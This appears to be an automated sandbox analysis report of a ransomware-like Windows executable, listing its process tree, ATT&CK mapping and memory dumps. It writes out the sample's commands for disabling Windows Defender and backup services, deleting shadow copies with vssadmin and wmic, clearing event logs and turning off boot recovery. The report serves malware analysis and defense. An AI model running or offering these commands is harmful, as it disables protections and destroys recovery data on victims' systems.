PID 3536 wrote to memory of 2228	3536	0e4d44dde522c07d09d9e3086cfae803.exe	net.exe
PID 3536 wrote to memory of 2228	3536	0e4d44dde522c07d09d9e3086cfae803.exe	net.exe
PID 2228 wrote to memory of 4696	2228	net.exe	net1.exe
PID 2228 wrote to memory of 4696	2228	net.exe	net1.exe
PID 3536 wrote to memory of 3692	3536	0e4d44dde522c07d09d9e3086cfae803.exe	net.exe
PID 3536 wrote to memory of 3692	3536	0e4d44dde522c07d09d9e3086cfae803.exe	net.exe
PID 3692 wrote to memory of 2248	3692	net.exe	net1.exe
PID 3692 wrote to memory of 2248	3692	net.exe	net1.exe
PID 3536 wrote to memory of 2692	3536	0e4d44dde522c07d09d9e3086cfae803.exe	net.exe
PID 3536 wrote to memory of 2692	3536	0e4d44dde522c07d09d9e3086cfae803.exe	net.exe
PID 2692 wrote to memory of 3084	2692	net.exe	net1.exe
PID 2692 wrote to memory of 3084	2692	net.exe	net1.exe
PID 3536 wrote to memory of 3232	3536	0e4d44dde522c07d09d9e3086cfae803.exe	net.exe
PID 3536 wrote to memory of 3232	3536	0e4d44dde522c07d09d9e3086cfae803.exe	net.exe
PID 3232 wrote to memory of 3708	3232	net.exe	net1.exe
PID 3232 wrote to memory of 3708	3232	net.exe	net1.exe
PID 3536 wrote to memory of 4464	3536	0e4d44dde522c07d09d9e3086cfae803.exe	sc.exe
PID 3536 wrote to memory of 4464	3536	0e4d44dde522c07d09d9e3086cfae803.exe	sc.exe
PID 3536 wrote to memory of 3860	3536	0e4d44dde522c07d09d9e3086cfae803.exe	sc.exe
PID 3536 wrote to memory of 3860	3536	0e4d44dde522c07d09d9e3086cfae803.exe	sc.exe
PID 3536 wrote to memory of 4180	3536	0e4d44dde522c07d09d9e3086cfae803.exe	sc.exe
PID 3536 wrote to memory of 4180	3536	0e4d44dde522c07d09d9e3086cfae803.exe	sc.exe
PID 3536 wrote to memory of 2192	3536	0e4d44dde522c07d09d9e3086cfae803.exe	sc.exe
PID 3536 wrote to memory of 2192	3536	0e4d44dde522c07d09d9e3086cfae803.exe	sc.exe
PID 3536 wrote to memory of 3872	3536	0e4d44dde522c07d09d9e3086cfae803.exe	sc.exe
PID 3536 wrote to memory of 3872	3536	0e4d44dde522c07d09d9e3086cfae803.exe	sc.exe
PID 3536 wrote to memory of 2684	3536	0e4d44dde522c07d09d9e3086cfae803.exe	sc.exe
PID 3536 wrote to memory of 2684	3536	0e4d44dde522c07d09d9e3086cfae803.exe	sc.exe
PID 3536 wrote to memory of 4120	3536	0e4d44dde522c07d09d9e3086cfae803.exe	sc.exe
PID 3536 wrote to memory of 4120	3536	0e4d44dde522c07d09d9e3086cfae803.exe	sc.exe
PID 3536 wrote to memory of 2112	3536	0e4d44dde522c07d09d9e3086cfae803.exe	sc.exe
PID 3536 wrote to memory of 2112	3536	0e4d44dde522c07d09d9e3086cfae803.exe	sc.exe
PID 3536 wrote to memory of 3696	3536	0e4d44dde522c07d09d9e3086cfae803.exe	reg.exe
PID 3536 wrote to memory of 3696	3536	0e4d44dde522c07d09d9e3086cfae803.exe	reg.exe
PID 3536 wrote to memory of 1696	3536	0e4d44dde522c07d09d9e3086cfae803.exe	reg.exe
PID 3536 wrote to memory of 1696	3536	0e4d44dde522c07d09d9e3086cfae803.exe	reg.exe
PID 3536 wrote to memory of 3896	3536	0e4d44dde522c07d09d9e3086cfae803.exe	reg.exe
PID 3536 wrote to memory of 3896	3536	0e4d44dde522c07d09d9e3086cfae803.exe	reg.exe
PID 3536 wrote to memory of 3912	3536	0e4d44dde522c07d09d9e3086cfae803.exe	reg.exe
PID 3536 wrote to memory of 3912	3536	0e4d44dde522c07d09d9e3086cfae803.exe	reg.exe
PID 3536 wrote to memory of 4252	3536	0e4d44dde522c07d09d9e3086cfae803.exe	reg.exe
PID 3536 wrote to memory of 4252	3536	0e4d44dde522c07d09d9e3086cfae803.exe	reg.exe
PID 3536 wrote to memory of 8	3536	0e4d44dde522c07d09d9e3086cfae803.exe	reg.exe
PID 3536 wrote to memory of 8	3536	0e4d44dde522c07d09d9e3086cfae803.exe	reg.exe
PID 3536 wrote to memory of 1644	3536	0e4d44dde522c07d09d9e3086cfae803.exe	reg.exe
PID 3536 wrote to memory of 1644	3536	0e4d44dde522c07d09d9e3086cfae803.exe	reg.exe
PID 3536 wrote to memory of 1440	3536	0e4d44dde522c07d09d9e3086cfae803.exe	reg.exe
PID 3536 wrote to memory of 1440	3536	0e4d44dde522c07d09d9e3086cfae803.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\0e4d44dde522c07d09d9e3086cfae803.exe
"C:\Users\Admin\AppData\Local\Temp\0e4d44dde522c07d09d9e3086cfae803.exe"
1⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3536

C:\Windows\SYSTEM32\net.exe
net.exe stop "SamSs" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:3752

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
3⤵
PID:204

C:\Windows\SYSTEM32\net.exe
net.exe stop "SDRSVC" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:4836

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
3⤵
PID:4568

C:\Windows\SYSTEM32\net.exe
net.exe stop "SstpSvc" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:4360

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
3⤵
PID:176

C:\Windows\SYSTEM32\net.exe
net.exe stop "vmicvss" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:4612

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
3⤵
PID:3836

C:\Windows\SYSTEM32\net.exe
net.exe stop "VSS" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:2228

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
3⤵
PID:4696

C:\Windows\SYSTEM32\net.exe
net.exe stop "wbengine" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:3692

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
3⤵
PID:2248

C:\Windows\SYSTEM32\net.exe
net.exe stop "WebClient" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:2692

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
3⤵
PID:3084

C:\Windows\SYSTEM32\net.exe
net.exe stop "UnistoreSvc_196e4" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:3232

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_196e4" /y
3⤵
PID:3708

C:\Windows\SYSTEM32\sc.exe
sc.exe config "SamSs" start= disabled
2⤵
- Launches sc.exe
PID:4464

C:\Windows\SYSTEM32\sc.exe
sc.exe config "SDRSVC" start= disabled
2⤵
- Launches sc.exe
PID:3860

C:\Windows\SYSTEM32\sc.exe
sc.exe config "SstpSvc" start= disabled
2⤵
- Launches sc.exe
PID:4180

C:\Windows\SYSTEM32\sc.exe
sc.exe config "vmicvss" start= disabled
2⤵
- Launches sc.exe
PID:2192

C:\Windows\SYSTEM32\sc.exe
sc.exe config "VSS" start= disabled
2⤵
- Launches sc.exe
PID:3872

C:\Windows\SYSTEM32\sc.exe
sc.exe config "wbengine" start= disabled
2⤵
- Launches sc.exe
PID:2684

C:\Windows\SYSTEM32\sc.exe
sc.exe config "WebClient" start= disabled
2⤵
- Launches sc.exe
PID:4120

C:\Windows\SYSTEM32\sc.exe
sc.exe config "UnistoreSvc_196e4" start= disabled
2⤵
- Launches sc.exe
PID:2112

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:3696

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
2⤵
PID:1696

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
2⤵
PID:3896

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
2⤵
PID:3912

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
2⤵
PID:4252

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:8

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1644

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1440

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1500

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:432

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
2⤵
PID:1908

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
2⤵
PID:4288

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
2⤵
PID:3780

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
2⤵
PID:3508

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
2⤵
PID:664

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
2⤵
PID:5076

C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
2⤵
PID:224

C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
2⤵
PID:3908

C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
2⤵
PID:2224

C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
2⤵
PID:3496

C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
2⤵
PID:5080

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
2⤵
PID:3664

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
2⤵
PID:5084

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
2⤵
PID:1856

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
2⤵
PID:1912

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
2⤵
PID:4208

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
2⤵
PID:1396

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:1100

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:808

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:4936

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:4660

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
2⤵
- Modifies security service
PID:4056

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:4348

C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
2⤵
- Interacts with shadow copies
PID:3172

C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl system
2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3368

C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl security
2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3868

C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl application
2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5068

C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2136

C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5028

C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
2⤵
- Modifies boot configuration data using bcdedit
PID:1536

C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
2⤵
- Modifies boot configuration data using bcdedit
PID:4384

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
2⤵
PID:4992

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
2⤵
PID:1164

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2400

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
2⤵
PID:2188

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3160

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

2

T1031

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Disabling Security Tools

1

T1089

Indicator Removal on Host

1

T1070

File Deletion

2

T1107

Credential Access

Credentials in Files

1

T1081

Discovery

Lateral Movement

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Impact

Inhibit System Recovery

3

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
memory/8-161-0x0000000000000000-mapping.dmp

Download
memory/176-137-0x0000000000000000-mapping.dmp

Download
memory/204-133-0x0000000000000000-mapping.dmp

Download
memory/224-172-0x0000000000000000-mapping.dmp

Download
memory/432-165-0x0000000000000000-mapping.dmp

Download
memory/664-170-0x0000000000000000-mapping.dmp

Download
memory/808-184-0x0000000000000000-mapping.dmp

Download
memory/1100-183-0x0000000000000000-mapping.dmp

Download
memory/1396-182-0x0000000000000000-mapping.dmp

Download
memory/1440-163-0x0000000000000000-mapping.dmp

Download
memory/1500-164-0x0000000000000000-mapping.dmp

Download
memory/1536-195-0x0000000000000000-mapping.dmp

Download
memory/1644-162-0x0000000000000000-mapping.dmp

Download
memory/1696-157-0x0000000000000000-mapping.dmp

Download
memory/1856-179-0x0000000000000000-mapping.dmp

Download
memory/1908-166-0x0000000000000000-mapping.dmp

Download
memory/1912-180-0x0000000000000000-mapping.dmp

Download
memory/2112-155-0x0000000000000000-mapping.dmp

Download
memory/2136-193-0x0000000000000000-mapping.dmp

Download
memory/2192-151-0x0000000000000000-mapping.dmp

Download
memory/2224-174-0x0000000000000000-mapping.dmp

Download
memory/2228-140-0x0000000000000000-mapping.dmp

Download
memory/2248-143-0x0000000000000000-mapping.dmp

Download
memory/2400-198-0x00007FF984A20000-0x00007FF9854E1000-memory.dmp

Filesize
10.8MB

Download
memory/2400-197-0x00007FF984A20000-0x00007FF9854E1000-memory.dmp

Filesize
10.8MB

Download
memory/2400-196-0x00000215D5D80000-0x00000215D5DA2000-memory.dmp

Filesize
136KB

Download
memory/2684-153-0x0000000000000000-mapping.dmp

Download
memory/2692-144-0x0000000000000000-mapping.dmp

Download
memory/3084-145-0x0000000000000000-mapping.dmp

Download
memory/3160-201-0x00007FF984970000-0x00007FF985431000-memory.dmp

Filesize
10.8MB

Download
memory/3172-189-0x0000000000000000-mapping.dmp

Download
memory/3232-146-0x0000000000000000-mapping.dmp

Download
memory/3368-190-0x0000000000000000-mapping.dmp

Download
memory/3496-175-0x0000000000000000-mapping.dmp

Download
memory/3508-169-0x0000000000000000-mapping.dmp

Download
memory/3664-177-0x0000000000000000-mapping.dmp

Download
memory/3692-142-0x0000000000000000-mapping.dmp

Download
memory/3696-156-0x0000000000000000-mapping.dmp

Download
memory/3708-147-0x0000000000000000-mapping.dmp

Download
memory/3752-132-0x0000000000000000-mapping.dmp

Download
memory/3780-168-0x0000000000000000-mapping.dmp

Download
memory/3836-139-0x0000000000000000-mapping.dmp

Download
memory/3860-149-0x0000000000000000-mapping.dmp

Download
memory/3868-191-0x0000000000000000-mapping.dmp

Download
memory/3872-152-0x0000000000000000-mapping.dmp

Download
memory/3896-158-0x0000000000000000-mapping.dmp

Download
memory/3908-173-0x0000000000000000-mapping.dmp

Download
memory/3912-159-0x0000000000000000-mapping.dmp

Download
memory/4056-187-0x0000000000000000-mapping.dmp

Download
memory/4120-154-0x0000000000000000-mapping.dmp

Download
memory/4180-150-0x0000000000000000-mapping.dmp

Download
memory/4208-181-0x0000000000000000-mapping.dmp

Download
memory/4252-160-0x0000000000000000-mapping.dmp

Download
memory/4288-167-0x0000000000000000-mapping.dmp

Download
memory/4348-188-0x0000000000000000-mapping.dmp

Download
memory/4360-136-0x0000000000000000-mapping.dmp

Download
memory/4464-148-0x0000000000000000-mapping.dmp

Download
memory/4568-135-0x0000000000000000-mapping.dmp

Download
memory/4612-138-0x0000000000000000-mapping.dmp

Download
memory/4660-186-0x0000000000000000-mapping.dmp

Download
memory/4696-141-0x0000000000000000-mapping.dmp

Download
memory/4836-134-0x0000000000000000-mapping.dmp

Download
memory/4936-185-0x0000000000000000-mapping.dmp

Download
memory/5028-194-0x0000000000000000-mapping.dmp

Download
memory/5068-192-0x0000000000000000-mapping.dmp

Download
memory/5076-171-0x0000000000000000-mapping.dmp

Download
memory/5080-176-0x0000000000000000-mapping.dmp

Download
memory/5084-178-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads